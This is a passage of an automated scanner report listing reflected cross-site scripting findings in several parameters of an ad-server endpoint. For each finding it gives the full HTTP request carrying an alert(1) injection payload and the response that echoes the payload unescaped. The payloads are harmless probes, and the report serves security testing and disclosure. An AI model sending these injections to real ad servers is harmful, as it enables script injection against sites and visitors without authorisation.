Cookie: id=c8e26c52e00001b|690327/426441/14933,2760581/556004/14933,2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 23:14:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8567

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
.smh.com.au%2Fsport,$http://t.invitemedia.com/track_click?auctionID=1290467459814544-63096&campID=43623&crID=63096&pubICode=2101142&pub=256078&partnerID=38&url=http%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2Fsport85df1"-alert(1)-"cf0abb156f8&redirectURL=http%3a%2f%2fwww.adobe.com/products/acrobat.html%3Fttsrccat%3DOMKWS%26sdid%3DIAOVF");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscrip
...[SNIP]...

2.14. http://vulnerable.ad.partner/adi/N4390.aod-invite.comOX15921/B4977097.2 [campID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/adi/N4390.aod-invite.comOX15921/B4977097.2

Issue detail

The value of the campID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36734"-alert(1)-"1956c1f7333 was submitted in the campID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N4390.aod-invite.comOX15921/B4977097.2;sz=728x90;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3B35c4f426847b7dd1%3B12c75dac242,0%3B%3B%3B536923774,zjgAANBtDABp.3AAAAAAAOPiHAAAAAAAAgAEAAYAAAAAAP8AAAACEv9yGAAAAAAA2NAfAAAAAAA1LSYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAQsLadSwBAAAAAAAAAGMzOTllYTJhLWY2OGQtMTFkZi05ZGY0LTAwMzA0OGQ2Njk2MgAzmSoAAAA=,,http%3A%2F%2Fwww.smh.com.au%2F,$http://t.invitemedia.com/track_click?auctionID=1290467459814544-69090&campID=4807536734"-alert(1)-"1956c1f7333&crID=69090&pubICode=2085080&pub=256078&partnerID=77&url=http%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2F&redirectURL=;ord=1290467459? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://ad.yieldmanager.com/iframe3?zjgAANBtDABp.3AAAAAAAOPiHAAAAAAAAgAEAAYAAAAAAP8AAAACEv9yGAAAAAAA2NAfAAAAAAA1LSYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAANDMzMzMz6T.NzMzMzMzsPzQzMzMzM.k.zczMzMzM.D80MzMzMzP5P83MzMzMzPw.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-tjDUAt0zCewKSTpHcUnbotYUzR62-vPI18MsAAAAAA==,,http%3A%2F%2Fwww.smh.com.au%2F,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D660181025%26u%3Dhttp%253A%252F%252Fwww.smh.com.au%252F,c399ea2a-f68d-11df-9df4-003048d66962
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: id=c8e26c52e00001b|690327/426441/14933,2760581/556004/14933,2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 23:13:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7787

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
AAwAAAAAAQsLadSwBAAAAAAAAAGMzOTllYTJhLWY2OGQtMTFkZi05ZGY0LTAwMzA0OGQ2Njk2MgAzmSoAAAA=,,http%3A%2F%2Fwww.smh.com.au%2F,$http://t.invitemedia.com/track_click?auctionID=1290467459814544-69090&campID=4807536734"-alert(1)-"1956c1f7333&crID=69090&pubICode=2085080&pub=256078&partnerID=77&url=http%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2F&redirectURL=http%3a%2f%2fwww.mycokerewards.com/holiday");
var fscUrl = url;
var fscUrlClickTagFound = fal
...[SNIP]...

2.15. http://vulnerable.ad.partner/adi/N4390.aod-invite.comOX15921/B4977097.2 [crID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/adi/N4390.aod-invite.comOX15921/B4977097.2

Issue detail

The value of the crID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74b03"-alert(1)-"71f48372c4e was submitted in the crID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N4390.aod-invite.comOX15921/B4977097.2;sz=728x90;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3B35c4f426847b7dd1%3B12c75dac242,0%3B%3B%3B536923774,zjgAANBtDABp.3AAAAAAAOPiHAAAAAAAAgAEAAYAAAAAAP8AAAACEv9yGAAAAAAA2NAfAAAAAAA1LSYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAQsLadSwBAAAAAAAAAGMzOTllYTJhLWY2OGQtMTFkZi05ZGY0LTAwMzA0OGQ2Njk2MgAzmSoAAAA=,,http%3A%2F%2Fwww.smh.com.au%2F,$http://t.invitemedia.com/track_click?auctionID=1290467459814544-69090&campID=48075&crID=6909074b03"-alert(1)-"71f48372c4e&pubICode=2085080&pub=256078&partnerID=77&url=http%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2F&redirectURL=;ord=1290467459? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://ad.yieldmanager.com/iframe3?zjgAANBtDABp.3AAAAAAAOPiHAAAAAAAAgAEAAYAAAAAAP8AAAACEv9yGAAAAAAA2NAfAAAAAAA1LSYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAANDMzMzMz6T.NzMzMzMzsPzQzMzMzM.k.zczMzMzM.D80MzMzMzP5P83MzMzMzPw.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-tjDUAt0zCewKSTpHcUnbotYUzR62-vPI18MsAAAAAA==,,http%3A%2F%2Fwww.smh.com.au%2F,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D660181025%26u%3Dhttp%253A%252F%252Fwww.smh.com.au%252F,c399ea2a-f68d-11df-9df4-003048d66962
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: id=c8e26c52e00001b|690327/426441/14933,2760581/556004/14933,2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 23:13:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7787

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
LadSwBAAAAAAAAAGMzOTllYTJhLWY2OGQtMTFkZi05ZGY0LTAwMzA0OGQ2Njk2MgAzmSoAAAA=,,http%3A%2F%2Fwww.smh.com.au%2F,$http://t.invitemedia.com/track_click?auctionID=1290467459814544-69090&campID=48075&crID=6909074b03"-alert(1)-"71f48372c4e&pubICode=2085080&pub=256078&partnerID=77&url=http%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2F&redirectURL=http%3a%2f%2fwww.mycokerewards.com/holiday");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wm
...[SNIP]...

2.16. http://vulnerable.ad.partner/adi/N4390.aod-invite.comOX15921/B4977097.2 [partnerID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/adi/N4390.aod-invite.comOX15921/B4977097.2

Issue detail

The value of the partnerID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec7a7"-alert(1)-"239c8de5255 was submitted in the partnerID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N4390.aod-invite.comOX15921/B4977097.2;sz=728x90;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3B35c4f426847b7dd1%3B12c75dac242,0%3B%3B%3B536923774,zjgAANBtDABp.3AAAAAAAOPiHAAAAAAAAgAEAAYAAAAAAP8AAAACEv9yGAAAAAAA2NAfAAAAAAA1LSYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAQsLadSwBAAAAAAAAAGMzOTllYTJhLWY2OGQtMTFkZi05ZGY0LTAwMzA0OGQ2Njk2MgAzmSoAAAA=,,http%3A%2F%2Fwww.smh.com.au%2F,$http://t.invitemedia.com/track_click?auctionID=1290467459814544-69090&campID=48075&crID=69090&pubICode=2085080&pub=256078&partnerID=77ec7a7"-alert(1)-"239c8de5255&url=http%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2F&redirectURL=;ord=1290467459? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://ad.yieldmanager.com/iframe3?zjgAANBtDABp.3AAAAAAAOPiHAAAAAAAAgAEAAYAAAAAAP8AAAACEv9yGAAAAAAA2NAfAAAAAAA1LSYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAANDMzMzMz6T.NzMzMzMzsPzQzMzMzM.k.zczMzMzM.D80MzMzMzP5P83MzMzMzPw.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-tjDUAt0zCewKSTpHcUnbotYUzR62-vPI18MsAAAAAA==,,http%3A%2F%2Fwww.smh.com.au%2F,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D660181025%26u%3Dhttp%253A%252F%252Fwww.smh.com.au%252F,c399ea2a-f68d-11df-9df4-003048d66962
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: id=c8e26c52e00001b|690327/426441/14933,2760581/556004/14933,2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 23:13:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7787

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
5ZGY0LTAwMzA0OGQ2Njk2MgAzmSoAAAA=,,http%3A%2F%2Fwww.smh.com.au%2F,$http://t.invitemedia.com/track_click?auctionID=1290467459814544-69090&campID=48075&crID=69090&pubICode=2085080&pub=256078&partnerID=77ec7a7"-alert(1)-"239c8de5255&url=http%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2F&redirectURL=http%3a%2f%2fwww.mycokerewards.com/holiday");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallo
...[SNIP]...

2.17. http://vulnerable.ad.partner/adi/N4390.aod-invite.comOX15921/B4977097.2 [pub parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/adi/N4390.aod-invite.comOX15921/B4977097.2

Issue detail

The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8f1c"-alert(1)-"789d23b1a00 was submitted in the pub parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N4390.aod-invite.comOX15921/B4977097.2;sz=728x90;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3B35c4f426847b7dd1%3B12c75dac242,0%3B%3B%3B536923774,zjgAANBtDABp.3AAAAAAAOPiHAAAAAAAAgAEAAYAAAAAAP8AAAACEv9yGAAAAAAA2NAfAAAAAAA1LSYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAQsLadSwBAAAAAAAAAGMzOTllYTJhLWY2OGQtMTFkZi05ZGY0LTAwMzA0OGQ2Njk2MgAzmSoAAAA=,,http%3A%2F%2Fwww.smh.com.au%2F,$http://t.invitemedia.com/track_click?auctionID=1290467459814544-69090&campID=48075&crID=69090&pubICode=2085080&pub=256078c8f1c"-alert(1)-"789d23b1a00&partnerID=77&url=http%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2F&redirectURL=;ord=1290467459? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://ad.yieldmanager.com/iframe3?zjgAANBtDABp.3AAAAAAAOPiHAAAAAAAAgAEAAYAAAAAAP8AAAACEv9yGAAAAAAA2NAfAAAAAAA1LSYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAANDMzMzMz6T.NzMzMzMzsPzQzMzMzM.k.zczMzMzM.D80MzMzMzP5P83MzMzMzPw.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-tjDUAt0zCewKSTpHcUnbotYUzR62-vPI18MsAAAAAA==,,http%3A%2F%2Fwww.smh.com.au%2F,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D660181025%26u%3Dhttp%253A%252F%252Fwww.smh.com.au%252F,c399ea2a-f68d-11df-9df4-003048d66962
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: id=c8e26c52e00001b|690327/426441/14933,2760581/556004/14933,2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 23:13:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7787

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
Y2OGQtMTFkZi05ZGY0LTAwMzA0OGQ2Njk2MgAzmSoAAAA=,,http%3A%2F%2Fwww.smh.com.au%2F,$http://t.invitemedia.com/track_click?auctionID=1290467459814544-69090&campID=48075&crID=69090&pubICode=2085080&pub=256078c8f1c"-alert(1)-"789d23b1a00&partnerID=77&url=http%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2F&redirectURL=http%3a%2f%2fwww.mycokerewards.com/holiday");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = ""
...[SNIP]...

2.18. http://vulnerable.ad.partner/adi/N4390.aod-invite.comOX15921/B4977097.2 [pubICode parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/adi/N4390.aod-invite.comOX15921/B4977097.2

Issue detail

The value of the pubICode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a56c4"-alert(1)-"4527fd21c20 was submitted in the pubICode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N4390.aod-invite.comOX15921/B4977097.2;sz=728x90;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3B35c4f426847b7dd1%3B12c75dac242,0%3B%3B%3B536923774,zjgAANBtDABp.3AAAAAAAOPiHAAAAAAAAgAEAAYAAAAAAP8AAAACEv9yGAAAAAAA2NAfAAAAAAA1LSYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAQsLadSwBAAAAAAAAAGMzOTllYTJhLWY2OGQtMTFkZi05ZGY0LTAwMzA0OGQ2Njk2MgAzmSoAAAA=,,http%3A%2F%2Fwww.smh.com.au%2F,$http://t.invitemedia.com/track_click?auctionID=1290467459814544-69090&campID=48075&crID=69090&pubICode=2085080a56c4"-alert(1)-"4527fd21c20&pub=256078&partnerID=77&url=http%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2F&redirectURL=;ord=1290467459? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://ad.yieldmanager.com/iframe3?zjgAANBtDABp.3AAAAAAAOPiHAAAAAAAAgAEAAYAAAAAAP8AAAACEv9yGAAAAAAA2NAfAAAAAAA1LSYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAANDMzMzMz6T.NzMzMzMzsPzQzMzMzM.k.zczMzMzM.D80MzMzMzP5P83MzMzMzPw.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-tjDUAt0zCewKSTpHcUnbotYUzR62-vPI18MsAAAAAA==,,http%3A%2F%2Fwww.smh.com.au%2F,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D660181025%26u%3Dhttp%253A%252F%252Fwww.smh.com.au%252F,c399ea2a-f68d-11df-9df4-003048d66962
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: id=c8e26c52e00001b|690327/426441/14933,2760581/556004/14933,2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 23:13:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7787

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
zOTllYTJhLWY2OGQtMTFkZi05ZGY0LTAwMzA0OGQ2Njk2MgAzmSoAAAA=,,http%3A%2F%2Fwww.smh.com.au%2F,$http://t.invitemedia.com/track_click?auctionID=1290467459814544-69090&campID=48075&crID=69090&pubICode=2085080a56c4"-alert(1)-"4527fd21c20&pub=256078&partnerID=77&url=http%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2F&redirectURL=http%3a%2f%2fwww.mycokerewards.com/holiday");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";

...[SNIP]...

2.19. http://vulnerable.ad.partner/adi/N4390.aod-invite.comOX15921/B4977097.2 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/adi/N4390.aod-invite.comOX15921/B4977097.2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fcbf"-alert(1)-"e6e2c411d4 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N4390.aod-invite.comOX15921/B4977097.2;sz=728x90;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3B35c4f426847b7dd1%3B12c75dac242,0%3B%3B%3B536923774,zjgAANBtDABp.3AAAAAAAOPiHAAAAAAAAgAEAAYAAAAAAP8AAAACEv9yGAAAAAAA2NAfAAAAAAA1LSYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAQsLadSwBAAAAAAAAAGMzOTllYTJhLWY2OGQtMTFkZi05ZGY0LTAwMzA0OGQ2Njk2MgAzmSoAAAA=,,http%3A%2F%2Fwww.smh.com.au%2F,$http://t.invitemedia.com/track_click?auctionID=1290467459814544-690905fcbf"-alert(1)-"e6e2c411d4&campID=48075&crID=69090&pubICode=2085080&pub=256078&partnerID=77&url=http%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2F&redirectURL=;ord=1290467459? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://ad.yieldmanager.com/iframe3?zjgAANBtDABp.3AAAAAAAOPiHAAAAAAAAgAEAAYAAAAAAP8AAAACEv9yGAAAAAAA2NAfAAAAAAA1LSYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAANDMzMzMz6T.NzMzMzMzsPzQzMzMzM.k.zczMzMzM.D80MzMzMzP5P83MzMzMzPw.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-tjDUAt0zCewKSTpHcUnbotYUzR62-vPI18MsAAAAAA==,,http%3A%2F%2Fwww.smh.com.au%2F,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D660181025%26u%3Dhttp%253A%252F%252Fwww.smh.com.au%252F,c399ea2a-f68d-11df-9df4-003048d66962
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: id=c8e26c52e00001b|690327/426441/14933,2760581/556004/14933,2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 23:13:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7783

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
DqcwYAAAAAAAIAAwAAAAAAQsLadSwBAAAAAAAAAGMzOTllYTJhLWY2OGQtMTFkZi05ZGY0LTAwMzA0OGQ2Njk2MgAzmSoAAAA=,,http%3A%2F%2Fwww.smh.com.au%2F,$http://t.invitemedia.com/track_click?auctionID=1290467459814544-690905fcbf"-alert(1)-"e6e2c411d4&campID=48075&crID=69090&pubICode=2085080&pub=256078&partnerID=77&url=http%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2F&redirectURL=http%3a%2f%2fwww.mycokerewards.com/holiday");
var fscUrl = url;
var fscUrlClickT
...[SNIP]...

2.20. http://vulnerable.ad.partner/adi/N4390.aod-invite.comOX15921/B4977097.2 [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/adi/N4390.aod-invite.comOX15921/B4977097.2

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e57a0"-alert(1)-"c88689bd8a5 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N4390.aod-invite.comOX15921/B4977097.2;sz=728x90;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3B35c4f426847b7dd1%3B12c75dac242,0%3B%3B%3B536923774,zjgAANBtDABp.3AAAAAAAOPiHAAAAAAAAgAEAAYAAAAAAP8AAAACEv9yGAAAAAAA2NAfAAAAAAA1LSYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAQsLadSwBAAAAAAAAAGMzOTllYTJhLWY2OGQtMTFkZi05ZGY0LTAwMzA0OGQ2Njk2MgAzmSoAAAA=,,http%3A%2F%2Fwww.smh.com.au%2F,$http://t.invitemedia.com/track_click?auctionID=1290467459814544-69090&campID=48075&crID=69090&pubICode=2085080&pub=256078&partnerID=77&url=http%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2Fe57a0"-alert(1)-"c88689bd8a5&redirectURL=;ord=1290467459? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://ad.yieldmanager.com/iframe3?zjgAANBtDABp.3AAAAAAAOPiHAAAAAAAAgAEAAYAAAAAAP8AAAACEv9yGAAAAAAA2NAfAAAAAAA1LSYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAANDMzMzMz6T.NzMzMzMzsPzQzMzMzM.k.zczMzMzM.D80MzMzMzP5P83MzMzMzPw.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-tjDUAt0zCewKSTpHcUnbotYUzR62-vPI18MsAAAAAA==,,http%3A%2F%2Fwww.smh.com.au%2F,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D660181025%26u%3Dhttp%253A%252F%252Fwww.smh.com.au%252F,c399ea2a-f68d-11df-9df4-003048d66962
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: id=c8e26c52e00001b|690327/426441/14933,2760581/556004/14933,2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 23:14:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7787

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
A%2F%2Fwww.smh.com.au%2F,$http://t.invitemedia.com/track_click?auctionID=1290467459814544-69090&campID=48075&crID=69090&pubICode=2085080&pub=256078&partnerID=77&url=http%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2Fe57a0"-alert(1)-"c88689bd8a5&redirectURL=http%3a%2f%2fwww.mycokerewards.com/holiday");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindo
...[SNIP]...

2.21. http://ad.turn.com/server/pixel.htm [fpid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/pixel.htm

Issue detail

